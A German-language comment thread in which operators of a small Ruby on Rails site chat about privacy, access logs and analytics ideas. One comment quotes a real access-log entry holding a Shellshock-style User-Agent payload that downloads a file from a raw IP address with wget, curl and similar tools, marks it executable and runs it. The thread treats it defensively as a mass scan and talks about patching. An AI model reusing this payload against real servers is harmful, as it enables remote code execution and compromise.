Wie schaut's hier eigentlich mit Privacy aus? Was passiert mit den Zugriff-Logs?
Privat ist, genau wie im übrigen Internet, nix. Wir gaukeln das auch gar nicht erst vor. Mit den Logs passiert derweil nix. Soll ich die löschen?
jensitus | 06.04.15 06:10
Um Gottes Willen, ja nicht löschen! War nur ein Wink mit dem Zaunpfahl, was du noch alles programmieren könntest. So Analysetools, die z.B. auswerten, wer, wann was anschaunt, wie viel Zeit zwischen anschaun und kommentieren vergeht, wer bei wem kommentiert, etc.
Fabsi | 06.04.15 10:36
Puh, ein hohes Anfordungspotential wohnt dem Zaunpfahl inne.
jensitus | 06.04.15 12:56
Das geht nur, wenn du mir hilfst oder der @fkleedorfer
jensitus | 06.04.15 12:57
Apropos: Wenn sowas in den Zugriffslogs steht: 180.137.45.70 - - [09/Apr/2015:10:36:21 +0200] "GET /cgi-bin/tools/tools.pl HTTP/1.1" 301 0 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* \x22);'"
jensitus | 09.04.15 08:52
ich wars nicht
Fabsi | 09.04.15 20:45
Eh nicht, aber was passiert da genau?
jensitus | 10.04.15 06:37
bei irgendeinem standard framework wird das halt ein bug sein, den man mit genau der abfrage ausnützen kann und die probiern halt einfach mal brute force mäßig server durch und hoffen, dass auf einem (oder mehreren) das framework (ungepacht) läuft
Fabsi | 10.04.15 16:58
Du meinst, wir müssen uns erstmal keine Sorgen machen?
jensitus | 10.04.15 17:02
nö, halt immer die augen offen halten ob's beim ruby on rails framework (die seite läuft jetzt auf dem, oder? vergess immer ob das noch spring oder schon ruby ist) irgendwelche sicherheitslücken gibt und die dann halt gleich patchen
Fabsi | 12.04.15 12:04
Diese Seite rennt mit Ruby on Rails, ja. Leider, wäre ich fast geneigt zu sagen, aber diese vielen verschiedenen Komponenten zusammen zu basteln ist damit definitiv einfacher als mit Spring. Wenn das hier mal fertig ist, schreib ich es um, versprochen - du kannst mir dann ja helfen ;)
Elias | 13.04.15 06:22
Oh, sorry, den vorherigen Kommentar hab ich mit einem Testaccount geschrieben, soll nicht wieder vorkommen.
jensitus | 13.04.15 06:24